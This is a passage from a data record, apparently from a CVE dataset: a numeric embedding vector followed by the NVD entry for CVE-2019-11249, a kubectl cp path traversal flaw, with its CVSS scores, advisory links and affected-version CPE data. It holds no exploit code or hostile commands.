0.00024488093913532794, -0.010507296770811081, 0.02316848188638687, -0.01679183542728424, -0.0036630292888730764, 0.008190448395907879, 0.001595047302544117, -0.017188604921102524, 0.010507296770811081, 0.01846393384039402, 0.0019218504894524813, -0.00379056204110384, -0.0071914405561983585, -0.007793679367750883, -0.018123846501111984, 0.005565395578742027, -0.002286736387759447, 0.007095790468156338, -0.021482214331626892, 0.013745215721428394, -0.017316138371825218, -0.007290632463991642, 0.013454724103212357, 0.023706955835223198, -0.007843275554478168, -0.010932406410574913, 0.001401090994477272, -0.008360492065548897, -0.0472438670694828, -0.0021131497342139482, 0.00016627991863060743, -0.004148362670093775, 0.00947286281734705, 0.030352838337421417, 0.00231153448112309, -0.0059763346798717976, -0.0007306574261747301, -0.004640781786292791, -0.016281703487038612, -0.005483916029334068, 0.0040350002236664295, -0.009649991989135742, 0.0013390957610681653, -0.01513390801846981, 0.002795096719637513, 0.01077653281390667, 0.005320957396179438, 0.0007687401957809925, -0.012427375651896, 0.006670680828392506, -0.01291625201702118, 0.008438428863883018, 0.030239475890994072, 0.017897121608257294, -0.006100325379520655, 0.011201642453670502, 0.0034805862233042717, -0.010223889723420143, -0.010819043964147568, -0.011187472380697727, -0.0014568866463378072, 0.00035912918974645436, -0.001541908597573638, -0.00006620198837481439, 0.017174433916807175, 0.0031033013947308064, -0.0047258036211133, -0.0010388620430603623, -0.005607906263321638, -0.04234093427658081, 0.02153889462351799, -0.0009564969805069268, 0.0003748493909370154, -0.01985262706875801, 0.0013506091199815273, -0.005012752953916788, -0.012512397952377796, -0.003601033939048648, 0.016281703487038612, -0.008707664906978607, -0.009076093323528767, -0.010762362740933895, 0.005586651153862476, -0.01849227584898472, 0.028439844027161598, 0.028213119134306908, 0.022899245843291283, -0.0015365947037935257, -0.007202067878097296, 0.006762788165360689, 0.013100465759634972, 0.004860421642661095, -0.019455857574939728, 0.00627391180023551, 0.021581405773758888, 0.004630153998732567, -0.0056539601646363735, -0.01503471564501524, -0.010266400873661041, -0.008445514366030693, 0.023791976273059845, -0.0012354752980172634, 0.007425250485539436, -0.005469745956361294, -0.007223323453217745, 0.005625619553029537, 0.0012859570560976863, -0.02177979052066803, -0.018988236784934998, -0.021227147430181503, 0.006178262177854776, 0.01864814944565296, -0.006181804463267326, 0.013171317987143993, 0.013681449927389622, 0.010259316302835941, -0.0002273894497193396, 0.02624344266951084, -0.01701856032013893, -0.01030891202390194, -0.015714891254901886, -0.014921353198587894, 0.012278587557375431, 0.0015684779500588775, 0.01707524247467518, -0.032081618905067444, -0.005675215274095535, -0.006132208276540041, -0.010401018895208836, -0.0260308887809515, 0.001355037442408502, -0.007432335987687111, -0.004796655382961035, 0.0017943175043910742, -0.018166357651352882, -0.020631995052099228, -0.013674364425241947, 0.0044990782625973225, 0.0011752514401450753, 0.021368851885199547, -0.0100609315559268, 0.00932407472282648, -0.019498368725180626, -0.015530676580965519, -0.007673231419175863, -0.02057531289756298, -0.020504461601376534, 0.001652614213526249, -0.010854469612240791, 0.02461385540664196, -0.0023381037171930075, -0.017358649522066116, -0.03100467287003994, 0.010705681517720222, 0.01220065075904131, -0.016040809452533722, -0.008473854511976242, -0.025875015184283257, -0.027589624747633934, -0.008686409331858158, 0.008459684439003468, -0.0018155729630962014, -0.02390533871948719, 0.013646023347973824, -0.010783618316054344, 0.008218788541853428, 0.018067166209220886, -0.0016508429544046521, -0.022672520950436592, 0.012484056875109673, -0.007311888039112091, -0.009749184362590313, -0.007241036277264357, -0.03338528797030449, -0.017613714560866356, 0.0034345327876508236, -0.01527561154216528, -0.0069009484723210335, -0.02036275900900364, 0.017585374414920807, -0.008813942782580853, -0.028553206473588943, -0.01707524247467518, 0.018506444990634918, -0.009458692744374275, 0.027263706550002098, -0.012760378420352936, 0.013320106081664562, -0.0023611304350197315, -0.001260273391380906, -0.017868781462311745, -0.002052925992757082, -0.0033920216374099255, 0.012760378420352936, 0.00841717328876257, 0.013752301223576069, 0.014056962914764881, -0.01703273132443428, 0.02812809683382511, 0.01252656802535057, -0.0022637094371020794, 0.012264416553080082, 0.014708798378705978, -0.007318973075598478, -0.010613573715090752, 0.0035868636332452297, 0.008176278322935104, -0.004640781786292791, -0.0009680103976279497, -0.006514807231724262, 0.0018775681965053082, -0.016154171898961067, 0.005069434177130461, 0.010960746556520462, -0.024075383320450783, -0.0378914512693882, -0.007588209584355354, -0.0077653382904827595, -0.011520475149154663, -0.008622643537819386, -0.014637946151196957, 0.006808841601014137, -0.009281563572585583, -0.008006233721971512, 0.004233384970575571, 0.006369561422616243, 0.013575172051787376, -0.0007448277319781482, 0.005494543816894293, 0.010358507744967937, 0.004548674449324608, -0.0049808695912361145, 0.005009210202842951, -0.022899245843291283, 0.012540738098323345, -0.0024284396786242723, -0.0035425813402980566, -0.006706106476485729, -0.008828112855553627, -0.0068974061869084835, 0.004966699052602053, -0.004672665148973465, 0.010415189899504185, -0.023551082238554955, -0.008466769941151142, -0.0023133056238293648, -0.01779792830348015, 0.015785742551088333, -0.0011513389181345701, 0.001493198098614812, 0.005600821226835251, 0.00381890288554132, -0.004956071265041828, -0.004534504376351833, 0.011166216805577278, 0.028354821726679802, -0.001537480391561985, -0.021439703181385994, 0.005512256640940905, -0.010641914792358875, 0.030636243522167206, 0.003379622707143426, 0.003053705208003521, -0.013752301223576069, 0.008934390731155872, 0.012002266012132168, -0.0047931126318871975, 0.009862546809017658, -0.004743516445159912, 0.0165934506803751, 0.0057602375745773315, 0.0030289071146398783, -0.004049170762300491, 0.017557034268975258, 0.008643899112939835, 0.006808841601014137, 0.008438428863883018, -0.003190094605088234, 0.004569930024445057, 0.01864814944565296, 0.003409734694287181, -0.0046266112476587296, -0.001932478160597384, -0.00794246792793274, -0.011966840364038944, -0.008750176057219505, -0.0013957771006971598, 0.001787232351489365, 0.01823720894753933, -0.0012726724380627275, -0.03432052955031395, -0.012611590325832367, -0.013575172051787376, 0.01146379392594099, 0.013575172051787376, -0.01582825370132923, 0.024571344256401062, 0.0013727502664551139, 0.010911150835454464, 0.011683433316648006, -0.012540738098323345, 0.006383731961250305, 0.0013506091199815273, -0.002146804239600897, -0.011895988136529922, 0.0036488589830696583, -0.010337253101170063, -0.001932478160597384, -0.008700580336153507, 0.0038968396838754416, -0.023777807131409645, 0.01701856032013893, -0.03593594580888748, 0.018633978441357613, 0.001673869788646698, -0.005781492684036493, 0.004424684215337038, -0.01864814944565296, 0.0009742099209688604, 0.020022669807076454, -0.03188323229551315, -0.003386707743629813, -0.026909448206424713, -0.012101458385586739, 0.015984127297997475, 0.019753433763980865, 0.0012638159096240997, 0.0038082750979810953, -0.006493551656603813, -0.007496102247387171, 0.01942751742899418, -0.0017252371180802584, -0.009161115624010563, 0.006316422484815121, -0.006645882967859507, -0.025719141587615013, 0.007878701202571392, -0.002097208285704255, -0.010315997526049614, 0.008672239258885384, 0.015927447006106377, -0.02936091460287571, 0.010797788389027119, 0.0016331300139427185, -0.001602132455445826, 0.0044955359771847725, 0.003035992383956909, -0.023536911234259605, 0.0010858011664822698, 0.0154031440615654, -0.004966699052602053, -0.003996031824499369, -0.0035709221847355366, -0.005788578186184168, 0.015119737945497036, 0.01348306518048048, -0.012639930471777916, 0.00030111943488009274, 0.006160549353808165, 0.00568584306165576, -0.000014959103282308206, -0.010011334903538227, 0.013518490828573704, -0.02836899273097515, 0.025903355330228806, 0.005515799392014742, 0.022374944761395454, -0.00656086066737771, -0.006936374586075544, -0.015969956293702126, 0.001939563313499093, 0.0028358364943414927, -0.001026462996378541, 0.014609606005251408, -0.02365027368068695, 0.014262433163821697, -0.0063553908839821815, 0.004619526211172342, 0.00024200259940698743, 0.02512398734688759, 0.015927447006106377, 0.0002913773350883275, -0.00873600598424673, 0.013518490828573704, 0.022544987499713898, 0.02033441700041294, -0.005597278475761414, -0.00804874487221241, 0.009961739182472229, 0.022063197568058968, 0.01466628722846508, 0.005887770559638739, -0.016012467443943024, -0.009968823753297329, 0.0026409944985061884, -0.009919228032231331, 0.0055724806152284145, 0.0010043218499049544, 0.005661045201122761, 0.01608332060277462, -0.00046496381401084363, 0.015615698881447315, 0.014290773309767246, 0.004403428640216589, 0.012824145145714283, -0.013150062412023544, 0.004824995994567871, 0.011215812526643276, 0.005041093565523624, -0.0026409944985061884, 0.00758112408220768, -0.004871049430221319, -0.014609606005251408, -0.006018845830112696, 0.001957276137545705, 0.010790702886879444, -0.014064048416912556, -0.005625619553029537, 0.008650983683764935, -0.0038153601344674826, 0.004651409573853016, 0.010748191736638546, -0.007481932174414396, 0.012066032737493515, 0.0118180513381958, 0.016026638448238373, -0.00003520440441207029, 0.013008358888328075, -0.004187331069260836, 0.014205751940608025, -0.01407821848988533, 0.009954653680324554, -0.0034061919432133436, 0.008509280160069466, -0.0019466484664008021, -0.005186339374631643, 0.02556326799094677, -0.006939916871488094, -0.010096357204020023, 0.011995180509984493, 0.02465636655688286, -0.01220773532986641, 0.019455857574939728, 0.0014639717992395163, -0.011322090402245522, -0.001590619096532464, 0.03171318769454956, -0.0003480586165096611, 0.003335340414196253, -0.02652684971690178, -0.007318973075598478, -0.00503400806337595, -0.002977539785206318, 0.0063553908839821815, -0.021964004263281822, -0.0005229735979810357, 0.011881818063557148, 0.0032999145332723856, -0.009494118392467499, -0.009678332135081291, -0.02037692815065384, 0.015459825284779072, 0.021397192031145096, 0.005405979230999947, 0.0003057690628338605, 0.007545698434114456, -0.007609465159475803, 0.000015277382772183046, 0.014064048416912556, -0.009316989220678806, 0.000509688921738416, -0.007269376888871193, 0.01134334597736597, 0.00034119488555006683, -0.01608332060277462, 0.011166216805577278, 0.010648999363183975, 0.0014453731710091233, -0.006582116242498159, 0.005243020597845316, 0.00686552282422781, -0.0014763708459213376, 0.040838878601789474, 0.00933115929365158, 0.007510272786021233, -0.012221906334161758, 0.015927447006106377, 0.0009742099209688604, -0.019030747935175896, 0.001128312200307846, 0.00602947361767292, 0.009154030121862888, 0.02508147619664669, -0.005916111171245575, 0.0008546477765776217, 0.017925461754202843, 0.007914126850664616, -0.006677765864878893, 0.011194556951522827, -0.0020051011815667152, 0.011527559719979763, 0.006079069804400206, 0.016225023195147514, 0.011307920329272747, -0.002230054931715131, 0.0017181519651785493, -0.01090406533330679, -0.010556892491877079, 0.0031263281125575304, 0.026186762377619743, -0.01866231858730316, 0.00898398645222187, -0.00497024180367589, 0.006358933635056019, 0.004056255798786879, 0.0009511831449344754, 0.02251664735376835, -0.009118604473769665, -0.03293183818459511, -0.008190448395907879, -0.01612582989037037, 0.009083178825676441, -0.006908033974468708, 0.027306217700242996, -0.016437577083706856, 0.011385857127606869, 0.02414623461663723, -0.018577296286821365, 0.008934390731155872, 0.0075952946208417416, -0.0029598267283290625, -0.0006155235460028052, -0.009536629542708397, 0.00934533029794693, 0.003113929182291031, -0.012292757630348206, 0.000859961670357734, -0.004371545277535915, 0.021878983825445175, 0.019229132682085037, 0.024670537561178207, -0.009394926019012928, -0.021142125129699707, 0.004070425871759653, -0.008452598936855793, 0.00033942359732463956, -0.003372537437826395, 0.017585374414920807, 0.009090264327824116, 0.005604363977909088, -0.005232392810285091, 0.004261725582182407, 0.027036981657147408, 0.014234092086553574, 0.0026728776283562183, -0.0053811813704669476, -0.009515373967587948, 0.011010343208909035, 0.026781916618347168, 0.002857091836631298, 0.03613433241844177, 0.011485048569738865, -0.019583391025662422, -0.00112565525341779, -0.033073540776968, -0.003441617824137211, 0.01660762168467045, -0.019980158656835556, -0.001978531712666154, 0.004927730653434992, -0.02913418971002102, 0.01560152880847454, 0.015148078091442585, -0.02268669195473194, 0.0016003611963242292, -0.00503400806337595, 0.0056220768019557, -0.008629728108644485, 0.01193141471594572, -0.008941475301980972, -0.005625619553029537, -0.01442539133131504, -0.029701001942157745, 0.015020545572042465, 0.008721835911273956, -0.0004875477752648294, 0.01565820910036564, -0.019569220021367073, 0.013837323524057865, 0.016494259238243103, -0.0027295590844005346, -0.005037550814449787, 0.016154171898961067, -0.020646164193749428, 0.017457840964198112, -0.0012062489986419678, 0.0036417737137526274, 0.0017792615108191967, -0.00794955249875784, 0.01656511053442955, 0.016040809452533722, -0.007552783470600843, -0.012909166514873505, -0.0038224454037845135, -0.03100467287003994, 0.013086295686662197, 0.0034044208005070686, -0.007807849440723658, -0.00590548338368535, -0.007623635232448578, -0.002517004031687975, 0.0035974914208054543, 0.0005367010599002242, -0.008473854511976242, -0.0064970944076776505, 0.0029208583291620016, -0.015020545572042465, -0.015332292765378952, 0.004608898423612118, -0.0037976473104208708, -0.014219922013580799, 0.0006509493687190115, -0.00012277258792892098, 0.025393223389983177, -0.004456567578017712, 0.0075952946208417416, 0.004927730653434992, -0.0036382311955094337, -0.004683292470872402, 0.0212696585804224, 0.002623281441628933, 0.0013134120963513851, -0.013206743635237217, 0.003372537437826395, 0.01385149359703064, -0.018407253548502922, 0.00733314361423254, -0.0015055971452966332, -0.02176561951637268, -0.013065040111541748, -0.006918661762028933, 0.007035566959530115, 0.008218788541853428, 0.006649425253272057, -0.016664303839206696, -0.003468187293037772, -0.012491142377257347, 0.01208020281046629, 0.004169618245214224, 0.004729346372187138, 0.02747626230120659, -0.0033831652253866196, -0.004024372436106205, 0.007311888039112091, 0.016961880028247833, -0.01351140532642603, -0.007715742569416761, -0.0009821807034313679, -0.005997590254992247, 0.017216945067048073, 0.002763213589787483, 0.00792121235281229, 0.016664303839206696, -0.016267534345388412, -0.0036346884444355965, 0.02226158231496811, -0.01088280975818634, 0.0023841573856770992, 0.012349438853561878, 0.02275754325091839, 0.015615698881447315, 0.005590193439275026, 0.013171317987143993, 0.001326696714386344, -0.005813376046717167, 0.00947286281734705, 0.01100325770676136, -0.010861555114388466, -0.004272353369742632, -0.007092248182743788, 0.01218647975474596, 0.020688675343990326, 0.0004902047221548855, -0.00531387235969305, 0.0177695881575346, -0.014389965683221817, -0.0039535206742584705, -0.011428367346525192, -0.0016517286421731114, -0.02434461936354637, -0.015077226795256138, -0.0236361026763916, 0.034688957035541534, 0.012873740866780281, 0.0177554190158844, 0.004236927255988121, -0.005448490381240845, -0.013249254785478115, 0.016876857727766037, 0.012958763167262077, -0.021014593541622162, -0.01419866643846035, -0.023366866633296013, -0.007269376888871193, 0.0011619667056947947, 0.007588209584355354, -0.0055476827546954155, -0.00804874487221241, -0.011903073638677597, -0.01112370565533638, -0.012880826368927956, -0.010670254938304424, 0.02936091460287571, 0.02084454894065857, 0.008247129619121552, 0.010578148066997528, 0.0030997588764876127, -0.035879265516996384, 0.009990079328417778, -0.010889895260334015, 0.02085871994495392, 0.008176278322935104, -0.004523876588791609, -0.012214820832014084, 0.01527561154216528, -0.017415329813957214, -0.01395777054131031, -0.00780076440423727, 0.0007359713199548423, 0.03055122308433056, 0.01849227584898472, 0.012505312450230122, -0.0004051827418152243, 0.01254782360047102, -0.0044140564277768135, 0.01441830676048994, 0.027561282739043236, 0.012838315218687057, 0.012165225110948086, 0.0012709010625258088, 0.004187331069260836, -0.010549807921051979, -0.01700439117848873, 0.019980158656835556, -0.010478955693542957, 0.018095506355166435, -0.006231400649994612, -0.00034208051511086524, -0.014021537266671658, -0.011286664754152298, -0.0007195868529379368, 0.016678472980856895, -0.0007682973518967628, 0.007673231419175863, -0.020773697644472122, 0.020405268296599388, 0.009777524508535862, 0.006050729192793369, -0.022771714255213737, -0.032109957188367844, 0.006511264480650425, -0.006217230577021837, 0.008700580336153507, -0.007722827605903149, -0.005469745956361294, -0.010684425942599773, -0.01489301212131977, -0.02437295950949192, 0.01205894723534584, -0.0038437009789049625, -0.01706107147037983, 0.015913276001811028, 0.02773132734000683, 0.037012889981269836, -0.0016517286421731114, -0.008509280160069466, 0.007666146382689476, 0.03171318769454956, -0.0018828820902854204, -0.004027915187180042, -0.023267675191164017, -0.011789711192250252, 0.0003124114009551704, 0.0005411293241195381, 0.0010096357436850667, 0.0036417737137526274, -0.006086154840886593, 0.0014444875996559858, -0.005126115400344133, -0.0004618640523403883, -0.006706106476485729, 0.0069824280217289925, 0.019540879875421524, 0.007708657067269087, 0.0010804873891174793, -0.012809974141418934, 0.0037763917353004217, -0.016947709023952484, 0.007184355054050684, 0.01537480391561985, -0.00898398645222187, 0.030211133882403374, 0.01003967598080635, 0.010691510513424873, 0.003537267679348588, 0.013787726871669292, -0.026640212163329124, -0.01826554909348488, 0.021113784983754158, 0.015332292765378952, 0.001939563313499093, 0.023281844332814217, -0.0036382311955094337, 0.00029381286003626883, 0.0006921318708918989, 0.00030975445406511426, 0.003282201709225774, 0.0034841287415474653, 0.0106277447193861, -0.019810115918517113, -0.0017181519651785493, -0.009118604473769665, 0.033271923661231995, 0.002203485695645213, 0.0007820248720236123, -0.011924329213798046, -0.0007926526013761759, 0.02060365304350853, 0.06223607063293457, -0.0106277447193861, -0.01373104564845562, -0.020447779446840286, -0.007899956777691841, -0.006284539587795734, -0.027646305039525032, 0.018378913402557373, 0.0017190376529470086, 0.019965989515185356, 0.008608472533524036, -0.0010920007480308414, -0.007156014442443848, 0.008310896344482899, 0.007510272786021233, -0.0033016859088093042, 0.028496524319052696, -0.006660053040832281, -0.013688534498214722, 0.0005123458686284721, 0.01429785881191492, -0.016026638448238373, 0.0071949828416109085, 0.007177270017564297, -0.0058665149845182896, -0.01895989663898945, 0.004343204665929079, -0.003988946788012981, -0.01266827154904604, 0.0015853052027523518, 0.005370553582906723, -0.0044140564277768135, -0.012746208347380161, 0.004927730653434992, -0.007758253253996372, -0.01560152880847454, -0.009458692744374275, 0.0064120725728571415, -0.005143828224390745, 0.01466628722846508, -0.03806149587035179, -0.00912568997591734, -0.018109675496816635, -0.0005654845735989511, 0.009203626774251461, -0.024273768067359924, -0.010273486375808716, -0.009494118392467499, -0.023296015337109566, 0.00721269566565752, -0.0030271357391029596, 0.0177554190158844, -0.012519482523202896, -0.00024288824351970106, -0.0048143682070076466, 0.022615840658545494, -0.011208727955818176, 0.004463652614504099, 0.03123139776289463, -0.0018040596041828394, 0.018364742398262024, 0.00627745408564806, -0.00013749644858762622, 0.01255490817129612, 0.011662177741527557, 0.014935523271560669, -0.0040952241979539394, -0.008976900950074196, 0.0015268526040017605, -0.004357375204563141, -0.0026905906852334738, -0.02601671777665615, -0.00301473680883646, -0.0018580839969217777, -0.010939491912722588, 0.012462801299989223, -0.01893155463039875, -0.007304803002625704, -0.00009039117867359892, 0.019257472828030586, 0.012094372883439064, -0.013341361656785011, 0.0017438357463106513, 0.014028622768819332, 0.006220772862434387, -0.004017287399619818, -0.02529403194785118, 0.014864671975374222, -0.013752301223576069, 0.03338528797030449, -0.014255347661674023, -0.027575453743338585, -0.030664585530757904, -0.006971800234168768, 0.03142978250980377, -0.002630366710945964, -0.024755559861660004, 0.00804874487221241, 0.008445514366030693, -0.025223180651664734, 0.029871046543121338, 0.008523451164364815, 0.012151054106652737, 0.02391950972378254, 0.001068088342435658, 0.017146093770861626, 0.017401160672307014, -0.006121580954641104, 0.021708939224481583, -0.03361201286315918, 0.006613999605178833, -0.009990079328417778, -0.004523876588791609, 0.014581264927983284, 0.011562985368072987, -0.010599403642117977, -0.010096357204020023, -0.04466486722230911, -0.01159132644534111, 0.011187472380697727, 0.014028622768819332, 0.005225307773798704, 0.017231116071343422, -0.011761370114982128, 0.006008218042552471, -0.022856734693050385, 0.019002405926585197, 0.005345755256712437, 0.0042015016078948975, 0.0019661327823996544, 0.006181804463267326, 0.008261299692094326, -0.0056575024500489235, -0.015984127297997475, 0.04857587814331055, 0.010982002131640911, 0.03854328766465187, -0.007354399189352989, -0.007375654764473438, 0.02743375115096569, -0.019555049017071724, -0.019044917076826096, -0.01513390801846981, 0.0023150769993662834, 0.008934390731155872, -0.01313589233905077, 0.011988095939159393, -0.004286523442715406, 0.005448490381240845, 0.015233100391924381, 0.00839591771364212, -0.00763780577108264, -0.01870482973754406, -0.0154031440615654, -0.029956068843603134, -0.022644180804491043, 0.028269799426198006, -0.03176987171173096, 0.004800197668373585, 0.0020245853811502457, 0.00984129123389721, 0.0045167915523052216, 0.01135043054819107, 0.01636672578752041, 0.021964004263281822, -0.004995039664208889, -0.0011566528119146824, 0.007311888039112091, 0.009968823753297329, -0.0007585552521049976, 0.024004532024264336, 0.01489301212131977, -0.00391455227509141, -0.0010716308606788516, 0.015247270464897156, 0.01701856032013893, -0.009947569109499454, 0.01266827154904604, 0.009494118392467499, -0.00484625156968832, 0.004938358440995216, -0.011917243711650372, 0.0154031440615654, 0.014581264927983284, -0.0065431478433310986, 0.0068159266375005245, -0.01706107147037983, -0.0007572267786599696, -0.01265410054475069, -0.008891879580914974, -0.007099333219230175, -0.012576163746416569, -0.014722968451678753, -0.010939491912722588, -0.006773415487259626, -0.003903924720361829, -0.012909166514873505, 0.0177554190158844, -0.024854751303792, -0.0014303172938525677, 0.011704688891768456, 0.01432619895786047, -0.021453872323036194, 0.013589342124760151, 0.0029598267283290625, 0.0020334417931735516, -0.0033760801889002323, 0.012597419321537018, -0.020731186494231224, -0.017939632758498192, 0.019980158656835556, -0.004973784554749727, 0.017443671822547913, 0.006585658993571997, -0.02746209129691124, -0.015176419168710709, -0.0038401582278311253, 0.002001558430492878, 0.0015339377569034696, -0.016990220174193382, -0.014921353198587894, -0.02553492784500122, 0.0016349013894796371, 0.03213829919695854, 0.013348447158932686, 0.005625619553029537, -0.0332152433693409, 0.0020582398865371943, 0.004481365438550711, -0.0015897334087640047, -0.02272920310497284, -0.015303951688110828, 0.004481365438550711, 0.009069008752703667, 0.00385078601539135, 0.02978602424263954, -0.02316848188638687, -0.010641914792358875, 0.019257472828030586, -0.009685417637228966, 0.0016694414662197232, -0.01312172133475542, -0.013646023347973824, 0.007503187283873558, -0.006837182212620974, 0.006256198976188898, -0.01632421463727951, 0.00039411219768226147, 0.023026779294013977, -0.007092248182743788, 0.010493125766515732, 0.0015870764618739486, -0.0003332240739837289, 0.006263284012675285, -0.017670396715402603, -0.004697463009506464, 0.043219491839408875, 0.03174152970314026, 0.006302252411842346, 0.0009029154316522181, 0.0007966380217112601, 0.025180669501423836, -0.00550162885338068, 0.019271643832325935, -0.006943459622561932, -0.02318265289068222, 0.019044917076826096, 0.019484197720885277, 0.022346604615449905, 0.02155306562781334, -0.010571062564849854, 0.0201218631118536, 0.01752869226038456, -0.0002674649003893137, -0.008835198357701302, 0.03945018723607063, 0.0037976473104208708, 0.008282555267214775, -0.00450262101367116, 0.012484056875109673, -0.002878347411751747, 0.0006243799580261111, -0.005611449014395475, -0.023806147277355194, 0.010500211268663406, 0.01431911438703537, 0.007651975844055414, -0.003113929182291031, 0.00142146076541394, 0.005115487612783909, 0.020036840811371803, 0.0032680314034223557, -0.036049310117959976, 0.009827121160924435, -0.010252230800688267, 0.006812383886426687, 0.0026161964051425457, 0.006174719426780939, -0.000747927522752434, 0.0032184352166950703, -0.004545132163912058, -0.00745359156280756, 0.028496524319052696, -0.0007705114549025893, -0.01823720894753933, -0.01087572518736124, 0.0024443811271339655, -0.005182796623557806, 0.012250246480107307, 0.017656225711107254, 0.011740114539861679, -0.009912142530083656, 0.01550233643501997, 0.010946576483547688, 0.02624344266951084, 0.0019891595002263784, 0.004481365438550711, 0.010457700118422508, 0.02583250403404236, -0.0000712390974513255, -0.008126681670546532, -0.00935241486877203, 0.017627885565161705, 0.019271643832325935, 0.007772423792630434, -0.02936091460287571, 0.024188745766878128, -0.01266827154904604, -0.0054449476301670074, 0.011442538350820541, 0.018846534192562103, 0.00969250313937664, 0.009437437169253826, -0.008360492065548897, -0.007843275554478168, -0.017599545419216156, -0.01136460155248642, 0.018534786999225616 ]
282
CVE-2019-11249
2019-08-29T01:15:11.443000
The kubectl cp command allows copying files between containers and the user machine. To copy files from a container, Kubernetes runs tar inside the container to create a tar archive, copies it over the network, and kubectl unpacks it on the user’s machine. If the tar binary in the container is malicious, it could run any code and output unexpected, malicious results. An attacker could use this to write files to any path on the user’s machine when kubectl cp is called, limited only by the system permissions of the local user. Kubernetes affected versions include versions prior to 1.13.9, versions prior to 1.14.5, versions prior to 1.15.2, and versions 1.1, 1.2, 1.4, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.10, 1.11, 1.12.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "jordan@liggitt.net", "type": "Secondary" } ], "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHBA-2019:2794" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHBA-2019:2816" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHBA-2019:2824" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3239" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3811" }, { "source": "jordan@liggitt.net", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/80984" }, { "source": "jordan@liggitt.net", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://groups.google.com/d/msg/kubernetes-security-announce/vUtEcSEY6SM/v2ZZxsmtFQAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20190919-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "ABCFC052-EAAD-4964-8B50-1D8A04A73D75", "versionEndExcluding": null, "versionEndIncluding": "1.12.10", "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "14126DA1-4F03-43D3-BD14-0BE06EC8F4E5", "versionEndExcluding": "1.13.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "E10D117F-F0C4-4355-98E3-BB4A401258DE", "versionEndExcluding": "1.14.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.14.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "2BECD4DB-0E6B-4C4A-B714-F6E4724BD0F6", "versionEndExcluding": "1.15.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:1.12.11:beta0:*:*:*:*:*:*", "matchCriteriaId": "3EAFE32A-5295-4A4B-9EC1-A1DB3CAE3DC8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.9:*:*:*:*:*:*:*", "matchCriteriaId": "309CB6F8-F178-454C-BE97-787F78647C28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*", "matchCriteriaId": "4DBCD38F-BBE8-488C-A8C3-5782F191D915", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], 